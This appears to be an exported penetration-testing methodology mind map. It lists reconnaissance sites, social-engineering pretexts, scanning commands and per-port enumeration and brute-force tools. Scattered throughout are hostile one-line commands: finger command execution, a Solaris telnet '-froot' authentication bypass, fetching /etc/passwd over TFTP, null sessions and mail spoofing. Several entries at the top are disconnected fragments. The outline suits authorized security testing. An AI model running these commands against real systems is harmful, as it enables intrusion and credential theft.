1. X11 port 6000^ open
1.1. X11 Enumeration
1.1.1. List open windows
1.1.2. Authentication Method
1.1.2.1. Xauth
1.1.2.2. Xhost
1.2. X11 Exploitation
1.2.1. xwd
1.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
1.2.2. Keystrokes
1.2.2.1. Received
1.2.2.2. Transmitted
1.2.3. Screenshots
1.2.4. xhost +
1.3. Examine Configuration Files
1.3.1. /etc/Xn.hosts
1.3.2. /usr/lib/X11/xdm
1.3.2.1. Untitled
1.3.3. /usr/lib/X11/xdm/xsession
1.3.4. /usr/lib/X11/xdm/xsession-remote
1.3.5. /usr/lib/X11/xdm/xsession.0
1.3.6. /usr/lib/X11/xdm/xdm-config
1.3.6.1. DisplayManager*authorize:on
2. pwdump [-h][-o][-u][-p] machineName
3. Nabil contributed the AS/400 section.
4. Client Side Security
5. Back end files
5.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf
6. Set objShell = CreateObject("WScript.Shell")
7. Check visible areas for sensitive information.
8. InitialProgram=c:\windows\system32\cmd.exe
9. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
10. http://secunia.com/advisories/search/?search=citrix
11. Pre-Inspection Visit - template
12. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
12.1. Untitled
12.1.1. Authoratitive Bodies
12.1.1.1. IANA - Internet Assigned Numbers Authority
12.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.
12.1.1.3. NRO - Number Resource Organisation
12.1.1.4. RIR - Regional Internet Registry
12.1.1.4.1. AFRINIC - African Network Information Centre
12.1.1.4.2. APNIC - Asia Pacific Network Information Centre
12.1.1.4.3. ARIN - American Registry for Internet Numbers
12.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre
12.1.1.4.5. RIPE - Reseaux IP Européens—Network Coordination Centre
12.1.2. Websites
12.1.2.1. Central Ops
12.1.2.1.1. Domain Dossier
12.1.2.1.2. Email Dossier
12.1.2.2. DNS Stuff
12.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
12.1.2.3. Fixed Orbit
12.1.2.3.1. Autonomous System lookups and other online tools available.
12.1.2.4. Geektools
12.1.2.5. IP2Location
12.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
12.1.2.6. Kartoo
12.1.2.6.1. Metasearch engine that visually presents its results.
12.1.2.7. MyIPNeighbors.com
12.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution
12.1.2.8. My-IP-Neighbors.com
12.1.2.8.1. Excellent site that can be used if the above is down
12.1.2.9. myipneighbors.net
12.1.2.10. Netcraft
12.1.2.10.1. Online search tool allowing queries for host information.
12.1.2.11. Passive DNS Replication
12.1.2.11.1. Finds shared domains based on supplied IP addresses
12.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script
12.1.2.12. Robtex
12.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.
12.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)
12.1.2.13. Traceroute.org
12.1.2.13.1. Website listing a large number links to online traceroute resources.
12.1.2.14. Wayback Machine
12.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
12.1.2.15. Whois.net
12.1.3. Tools
12.1.3.1. Cheops-ng
12.1.3.2. Country whois
12.1.3.3. Domain Research Tool
12.1.3.4. Firefox Plugins
12.1.3.4.1. AS Number
12.1.3.4.2. Shazou
12.1.3.4.3. Firecat Suite
12.1.3.5. Gnetutil
12.1.3.6. Goolag Scanner
12.1.3.7. Greenwich
12.1.3.8. Maltego
12.1.3.9. GTWhois
12.1.3.10. Sam Spade
12.1.3.11. Smart whois
12.1.3.12. SpiderFoot
12.2. Internet Search
12.2.1. General Information
12.2.1.1. Web Investigator
12.2.1.2. Tracesmart
12.2.1.3. Friends Reunited
12.2.1.4. Ebay - profiles etc.
12.2.2. Financial
12.2.2.1. EDGAR - Company information, including real-time filings. US
12.2.2.2. Google Finance - General Finance Portal
12.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK
12.2.2.4. Companies House UK
12.2.2.5. Land Registry UK
12.2.3. Phone book/ Electoral Role Information
12.2.3.1. 123people
12.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world
12.2.3.2. 192.com
12.2.3.2.1. Electoral Role Search. UK
12.2.3.3. 411
12.2.3.3.1. Online White Pages and Yellow Pages. US
12.2.3.4. Untitled
12.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US
12.2.3.5. BT.com. UK
12.2.3.5.1. Residential
12.2.3.5.2. Business
12.2.3.6. Pipl
12.2.3.6.1. Untitled
12.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1
12.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1
12.2.3.7. Spokeo
12.2.3.7.1. http://www.spokeo.com/user?q=domain_name
12.2.3.7.2. http://www.spokeo.com/user?q=email_address
12.2.3.8. Yasni
12.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword
12.2.3.9. Zabasearch
12.2.3.9.1. People Search Engine. US
12.2.4. Generic Web Searching
12.2.4.1. Code Search
12.2.4.2. Forum Entries
12.2.4.3. Google Hacking Database
12.2.4.4. Google
12.2.4.4.1. Email Addresses
12.2.4.4.2. Contact Details
12.2.4.5. Newsgroups/forums
12.2.4.6. Blog Search
12.2.4.6.1. Yammer
12.2.4.6.2. Google Blog Search
12.2.4.6.3. Technorati
12.2.4.6.4. Jaiku
12.2.4.6.5. Present.ly
12.2.4.6.6. Twitter Network Browser
12.2.4.7. Search Engine Comparison/ Aggregator Sites
12.2.4.7.1. Clusty
12.2.4.7.2. Grokker
12.2.4.7.3. Zuula
12.2.4.7.4. Exalead
12.2.4.7.5. Delicious
12.2.5. Metadata Search
12.2.5.1. Untitled
12.2.5.1.1. MetaData Visualisation Sites
12.2.5.1.2. Tools
12.2.5.1.3. Wikipedia Metadata Search
12.2.6. Social/ Business Networks
12.2.6.1. Untitled
12.2.6.1.1. Africa
12.2.6.1.2. Australia
12.2.6.1.3. Belgium
12.2.6.1.4. Holland
12.2.6.1.5. Hungary
12.2.6.1.6. Iran
12.2.6.1.7. Japan
12.2.6.1.8. Korea
12.2.6.1.9. Poland
12.2.6.1.10. Russia
12.2.6.1.11. Sweden
12.2.6.1.12. UK
12.2.6.1.13. US
12.2.6.1.14. Assorted
12.2.7. Resources
12.2.7.1. OSINT
12.2.7.2. International Directory of Search Engines
12.3. DNS Record Retrieval from publically available servers
12.3.1. Types of Information Records
12.3.1.1. SOA Records - Indicates the server that has authority for the domain.
12.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).
12.3.1.3. NS Records - List of a host’s or domain’s name server(s).
12.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
12.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.
12.3.1.6. SRV Records - Service location record.
12.3.1.7. HINFO Records - Host information record with CPU type and operating system.
12.3.1.8. TXT Records - Generic text record.
12.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.
12.3.1.10. RP - Responsible person for the domain.
12.3.2. Database Settings
12.3.2.1. Version.bind
12.3.2.2. Serial
12.3.2.3. Refresh
12.3.2.4. Retry
12.3.2.5. Expiry
12.3.2.6. Minimum
12.3.3. Sub Domains
12.3.4. Internal IP ranges
12.3.4.1. Reverse DNS for IP Range
12.3.5. Zone Transfer
12.4. Social Engineering
12.4.1. Remote
12.4.1.1. Phone
12.4.1.1.1. Scenarios
12.4.1.1.2. Results
12.4.1.1.3. Contact Details
12.4.1.2. Email
12.4.1.2.1. Scenarios
12.4.1.2.2. Software
12.4.1.2.3. Results
12.4.1.2.4. Contact Details
12.4.1.3. Other
12.4.2. Local
12.4.2.1. Personas
12.4.2.1.1. Name
12.4.2.1.2. Phone
12.4.2.1.3. Email
12.4.2.1.4. Business Cards
12.4.2.2. Contact Details
12.4.2.2.1. Name
12.4.2.2.2. Phone number
12.4.2.2.3. Email
12.4.2.2.4. Room number
12.4.2.2.5. Department
12.4.2.2.6. Role
12.4.2.3. Scenarios
12.4.2.3.1. New IT employee
12.4.2.3.2. Fire Inspector
12.4.2.4. Results
12.4.2.5. Maps
12.4.2.5.1. Satalitte Imagery
12.4.2.5.2. Building layouts
12.4.2.6. Other
12.5. Dumpster Diving
12.5.1. Rubbish Bins
12.5.2. Contract Waste Removal
12.5.3. Ebay ex-stock sales i.e. HDD
12.6. Web Site copy
12.6.1. htttrack
12.6.2. teleport pro
12.6.3. Black Widow
13. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
13.1. Default Port Lists
13.1.1. Windows
13.1.2. *nix
13.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific
13.2.1. General Enumeration Tools
13.2.1.1. nmap
13.2.1.1.1. nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml
13.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
13.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
13.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason
13.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
13.2.1.2. netcat
13.2.1.2.1. nc -v -n IP_Address port
13.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number
13.2.1.3. amap
13.2.1.3.1. amap -bqv 192.168.1.1 80
13.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
13.2.1.4. xprobe2
13.2.1.4.1. xprobe2 192.168.1.1
13.2.1.5. sinfp
13.2.1.5.1. ./sinfp.pl -i -p
13.2.1.6. nbtscan
13.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
13.2.1.7. hping
13.2.1.7.1. hping ip_address
13.2.1.8. scanrand
13.2.1.8.1. scanrand ip_address:all
13.2.1.9. unicornscan
13.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
13.2.1.10. netenum
13.2.1.10.1. netenum network/netmask timeout
13.2.1.11. fping
13.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)
13.2.2. Firewall Specific Tools
13.2.2.1. firewalk
13.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
13.2.2.2. ftester
13.2.2.2.1. host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log
13.2.3. Default Passwords (Examine list)
13.2.3.1. Passwords A
13.2.3.2. Passwords B
13.2.3.3. Passwords C
13.2.3.4. Passwords D
13.2.3.5. Passwords E
13.2.3.6. Passwords F
13.2.3.7. Passwords G
13.2.3.8. Passwords H
13.2.3.9. Passwords I
13.2.3.10. Passwords J
13.2.3.11. Passwords K
13.2.3.12. Passwords L
13.2.3.13. Passwords M
13.2.3.14. Passwords N
13.2.3.15. Passwords O
13.2.3.16. Passwords P
13.2.3.17. Passwords R
13.2.3.18. Passwords S
13.2.3.19. Passwords T
13.2.3.20. Passwords U
13.2.3.21. Passwords V
13.2.3.22. Passwords W
13.2.3.23. Passwords X
13.2.3.24. Passwords Y
13.2.3.25. Passwords Z
13.2.3.26. Passwords (Numeric)
13.3. Active Hosts
13.3.1. Open TCP Ports
13.3.2. Closed TCP Ports
13.3.3. Open UDP Ports
13.3.4. Closed UDP Ports
13.3.5. Service Probing
13.3.5.1. SMTP Mail Bouncing
13.3.5.2. Banner Grabbing
13.3.5.2.1. Other
13.3.5.2.2. HTTP
13.3.5.2.3. HTTPS
13.3.5.2.4. SMTP
13.3.5.2.5. POP3
13.3.5.2.6. FTP
13.3.6. ICMP Responses
13.3.6.1. Type 3 (Port Unreachable)
13.3.6.2. Type 8 (Echo Request)
13.3.6.3. Type 13 (Timestamp Request)
13.3.6.4. Type 15 (Information Request)
13.3.6.5. Type 17 (Subnet Address Mask Request)
13.3.6.6. Responses from broadcast address
13.3.7. Source Port Scans
13.3.7.1. TCP/UDP 53 (DNS)
13.3.7.2. TCP 20 (FTP Data)
13.3.7.3. TCP 80 (HTTP)
13.3.7.4. TCP/UDP 88 (Kerberos)
13.3.8. Firewall Assessment
13.3.8.1. Firewalk
13.3.8.2. TCP/UDP/ICMP responses
13.3.9. OS Fingerprint
14. Enumeration
14.1. Daytime port 13 open
14.1.1. nmap nse script
14.1.1.1. daytime
14.2. FTP port 21 open
14.2.1. Fingerprint server
14.2.1.1. telnet ip_address 21 (Banner grab)
14.2.1.2. Run command ftp ip_address
14.2.1.3. [email protected]
14.2.1.4. Check for anonymous access
14.2.1.4.1. ftp ip_addressUsername: anonymous OR anonPassword: [email protected]
14.2.2. Password guessing
14.2.2.1. Hydra brute force
14.2.2.2. medusa
14.2.2.3. Brutus
14.2.3. Examine configuration files
14.2.3.1. ftpusers
14.2.3.2. ftp.conf
14.2.3.3. proftpd.conf
14.2.4. MiTM
14.2.4.1. pasvagg.pl
14.3. SSH port 22 open
14.3.1. Fingerprint server
14.3.1.1. telnet ip_address 22 (banner grab)
14.3.1.2. scanssh
14.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
14.3.2. Password guessing
14.3.2.1. ssh root@ip_address
14.3.2.2. guess-who
14.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location
14.3.2.3. Hydra brute force
14.3.2.4. brutessh
14.3.2.5. Ruby SSH Bruteforcer
14.3.3. Examine configuration files
14.3.3.1. ssh_config
14.3.3.2. sshd_config
14.3.3.3. authorized_keys
14.3.3.4. ssh_known_hosts
14.3.3.5. .shosts
14.3.4. SSH Client programs
14.3.4.1. tunnelier
14.3.4.2. winsshd
14.3.4.3. putty
14.3.4.4. winscp
14.4. Telnet port 23 open
14.4.1. Fingerprint server
14.4.1.1. telnet ip_address
14.4.1.1.1. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
14.4.1.2. telnetfp
14.4.2. Password Attack
14.4.2.1. Untitled
14.4.2.2. Hydra brute force
14.4.2.3. Brutus
14.4.2.4. telnet -l "-froot" hostname (Solaris 10+)
14.4.3. Examine configuration files
14.4.3.1. /etc/inetd.conf
14.4.3.2. /etc/xinetd.d/telnet
14.4.3.3. /etc/xinetd.d/stelnet
14.5. Sendmail Port 25 open
14.5.1. Fingerprint server
14.5.1.1. telnet ip_address 25 (banner grab)
14.5.2. Mail Server Testing
14.5.2.1. Enumerate users
14.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)
14.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)
14.5.2.2. Mail Spoof Test
14.5.2.2.1. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
14.5.2.3. Mail Relay Test
14.5.2.3.1. Untitled
14.5.3. Examine Configuration Files
14.5.3.1. sendmail.cf
14.5.3.2. submit.cf
14.6. DNS port 53 open
14.6.1. Fingerprint server/ service
14.6.1.1. host
14.6.1.1.1. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
14.6.1.2. nslookup
14.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]
14.6.1.3. dig
14.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
14.6.1.4. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
14.6.2. DNS Enumeration
14.6.2.1. Bile Suite
14.6.2.1.1. perl BiLE.pl [website] [project_name]
14.6.2.1.2. perl BiLE-weigh.pl [website] [input file]
14.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
14.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]
14.6.2.1.5. perl exp-tld.pl [input file] [output file]
14.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
14.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]
14.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]
14.6.2.2. txdns
14.6.2.2.1. txdns -rt -t domain_name
14.6.2.2.2. txdns -x 50 -bb domain_name
14.6.2.3. nmap nse scripts
14.6.2.3.1. dns-random-srcport
14.6.2.3.2. dns-random-txid
14.6.2.3.3. dns-recursion
14.6.2.3.4. dns-zone-transfer
14.6.3. Examine Configuration Files
14.6.3.1. host.conf
14.6.3.2. resolv.conf
14.6.3.3. named.conf
14.7. TFTP port 69 open
14.7.1. TFTP Enumeration
14.7.1.1. tftp ip_address PUT local_file
14.7.1.2. tftp ip_address GET conf.txt (or other files)
14.7.1.3. Solarwinds TFTP server
14.7.1.4. tftp – i <IP> GET /etc/passwd (old Solaris)
14.7.2. TFTP Bruteforcing
14.7.2.1. TFTP bruteforcer
14.7.2.2. Cisco-Torch
14.8. Finger Port 79 open
14.8.1. User enumeration
14.8.1.1. finger 'a b c d e f g h' @example.com
14.8.1.2. finger [email protected]
14.8.1.3. finger [email protected]
14.8.1.4. finger [email protected]
14.8.1.5. finger [email protected]
14.8.1.6. finger **@example.com
14.8.1.7. finger [email protected]
14.8.1.8. finger @example.com
14.8.1.9. nmap nse script
14.8.1.9.1. finger
14.8.2. Command execution
14.8.2.1. finger "|/bin/[email protected]"
14.8.2.2. finger "|/bin/ls -a /@example.com"
14.8.3. Finger Bounce
14.8.3.1. finger user@host@victim
14.8.3.2. finger @internal@external
14.9. Web Ports 80,8080 etc. open
14.9.1. Fingerprint server
14.9.1.1. Telnet ip_address port
14.9.1.2. Firefox plugins
14.9.1.2.1. All
14.9.1.2.2. Specific
14.9.2. Crawl website
14.9.2.1. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
14.9.2.2. httprint
14.9.2.3. Metagoofil
14.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
14.9.3. Web Directory enumeration
14.9.3.1. Nikto
14.9.3.1.1. nikto [-h target] [options]
14.9.3.2. DirBuster
14.9.3.3. Wikto
14.9.3.4. Goolag Scanner
14.9.4. Vulnerability Assessment
14.9.4.1. Manual Tests
14.9.4.1.1. Default Passwords
14.9.4.1.2. Install Backdoors
14.9.4.1.3. Method Testing
14.9.4.1.4. Upload Files
14.9.4.1.5. View Page Source
14.9.4.1.6. Input Validation Checks
14.9.4.1.7. Automated table and column iteration
14.9.4.2. Vulnerability Scanners
14.9.4.2.1. Acunetix
14.9.4.2.2. Grendelscan
14.9.4.2.3. NStealth
14.9.4.2.4. Obiwan III
14.9.4.2.5. w3af
14.9.4.3. Specific Applications/ Server Tools
14.9.4.3.1. Domino
14.9.4.3.2. Joomla
14.9.4.3.3. aspaudit.pl
14.9.4.3.4. Vbulletin
14.9.4.3.5. ZyXel
14.9.5. Proxy Testing
14.9.5.1. Burpsuite
14.9.5.2. Crowbar
14.9.5.3. Interceptor
14.9.5.4. Paros
14.9.5.5. Requester Raw
14.9.5.6. Suru
14.9.5.7. WebScarab
14.9.6. Examine configuration files
14.9.6.1. Generic
14.9.6.1.1. Examine httpd.conf/ windows config files
14.9.6.2. JBoss
14.9.6.2.1. JMX Console http://<IP>:8080/jmxconcole/
14.9.6.3. Joomla
14.9.6.3.1. configuration.php
14.9.6.3.2. diagnostics.php
14.9.6.3.3. joomla.inc.php
14.9.6.3.4. config.inc.php
14.9.6.4. Mambo
14.9.6.4.1. configuration.php
14.9.6.4.2. config.inc.php
14.9.6.5. Wordpress
14.9.6.5.1. setup-config.php
14.9.6.5.2. wp-config.php
14.9.6.6. ZyXel
14.9.6.6.1. /WAN.html (contains PPPoE ISP password)
14.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)
14.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)
14.9.6.6.4. /Firewall_DefPolicy.html (Firewall)
14.9.6.6.5. /CF_Keyword.html (Content Filter)
14.9.6.6.6. /RemMagWWW.html (Remote MGMT)
14.9.6.6.7. /rpSysAdmin.html (System)
14.9.6.6.8. /LAN_IP.html (LAN)
14.9.6.6.9. /NAT_General.html (NAT)
14.9.6.6.10. /ViewLog.html (Logs)
14.9.6.6.11. /rpFWUpload.html (Tools)
14.9.6.6.12. /DiagGeneral.html (Diagnostic)
14.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)
14.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)
14.9.6.6.15. Config Backups
14.9.7. Examine web server logs
14.9.7.1. c:\winnt\system32\Logfiles\W3SVC1
14.9.7.1.1. awk -F " " '{print $3,$11} filename | sort | uniq
14.9.8. References
14.9.8.1. White Papers
14.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
14.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
14.9.8.1.3. Blind Security Testing - An Evolutionary Approach
14.9.8.1.4. Command Injection in XML Signatures and Encryption
14.9.8.1.5. Input Validation Cheat Sheet
14.9.8.1.6. SQL Injection Cheat Sheet
14.9.8.2. Books
14.9.8.2.1. Hacking Exposed Web 2.0
14.9.8.2.2. Hacking Exposed Web Applications
14.9.8.2.3. The Web Application Hacker's Handbook
14.9.9. Exploit Frameworks
14.9.9.1. Brute-force Tools
14.9.9.1.1. Acunetix
14.9.9.2. Metasploit
14.9.9.3. w3af
14.10. Portmapper port 111 open
14.10.1. rpcdump.py
14.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
14.10.2. rpcinfo
14.10.2.1. rpcinfo [options] IP_Address
14.11. NTP Port 123 open
14.11.1. NTP Enumeration
14.11.1.1. ntpdc -c monlist IP_ADDRESS
14.11.1.2. ntpdc -c sysinfo IP_ADDRESS
14.11.1.3. ntpq
14.11.1.3.1. host
14.11.1.3.2. hostname
14.11.1.3.3. ntpversion
14.11.1.3.4. readlist
14.11.1.3.5. version
14.11.2. Examine configuration files
14.11.2.1. ntp.conf
14.11.3. nmap nse script
14.11.3.1. ntp-info
14.12. NetBIOS Ports 135-139,445 open
14.12.1. NetBIOS enumeration
14.12.1.1. Enum
14.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
14.12.1.2. Null Session
14.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""
14.12.1.3. Smbclient
14.12.1.3.1. smbclient -L //server/share password options
14.12.1.4. Superscan
14.12.1.4.1. Enumeration tab.
14.12.1.5. user2sid/sid2user
14.12.1.6. Winfo
14.12.2. NetBIOS brute force
14.12.2.1. Hydra
14.12.2.2. Brutus
14.12.2.3. Cain & Abel
14.12.2.4. getacct
14.12.2.5. NAT (NetBIOS Auditing Tool)
14.12.3. Examine Configuration Files
14.12.3.1. Smb.conf
14.12.3.2. lmhosts
14.13. SNMP port 161 open
14.13.1. Default Community Strings
14.13.1.1. public
14.13.1.2. private
14.13.1.3. cisco
14.13.1.3.1. cable-docsis
14.13.1.3.2. ILMI
14.13.2. MIB enumeration
14.13.2.1. Windows NT
14.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames
14.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name
14.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames
14.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
14.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information
14.13.2.2. Solarwinds MIB walk
14.13.2.3. Getif
14.13.2.4. snmpwalk
14.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>
14.13.2.5. Snscan
14.13.2.6. Applications
14.13.2.6.1. ZyXel
14.13.2.7. nmap nse script
14.13.2.7.1. snmp-sysdescr
14.13.3. SNMP Bruteforce
14.13.3.1. onesixtyone
14.13.3.1.1. onesixytone -c SNMP.wordlist <IP>
14.13.3.2. cat
14.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist
14.13.3.3. Solarwinds SNMP Brute Force
14.13.3.4. ADMsnmp
14.13.3.5. nmap nse script
14.13.3.5.1. snmp-brute
14.13.4. Examine SNMP Configuration files
14.13.4.1. snmp.conf
14.13.4.2. snmpd.conf
14.13.4.3. snmp-config.xml
14.14. LDAP Port 389 Open
14.14.1. ldap enumeration
14.14.1.1. ldapminer
14.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d
14.14.1.2. luma
14.14.1.2.1. Gui based tool
14.14.1.3. ldp
14.14.1.3.1. Gui based tool
14.14.1.4. openldap
14.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
14.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
14.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
14.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
14.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
14.14.2. ldap brute force
14.14.2.1. bf_ldap
14.14.2.1.1. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
14.14.2.2. K0ldS
14.14.2.3. LDAP_Brute.pl
14.14.3. Examine Configuration Files
14.14.3.1. General
14.14.3.1.1. containers.ldif
14.14.3.1.2. ldap.cfg
14.14.3.1.3. ldap.conf
14.14.3.1.4. ldap.xml
14.14.3.1.5. ldap-config.xml
14.14.3.1.6. ldap-realm.xml
14.14.3.1.7. slapd.conf
14.14.3.2. IBM SecureWay V3 server
14.14.3.2.1. V3.sas.oc
14.14.3.3. Microsoft Active Directory server
14.14.3.3.1. msadClassesAttrs.ldif
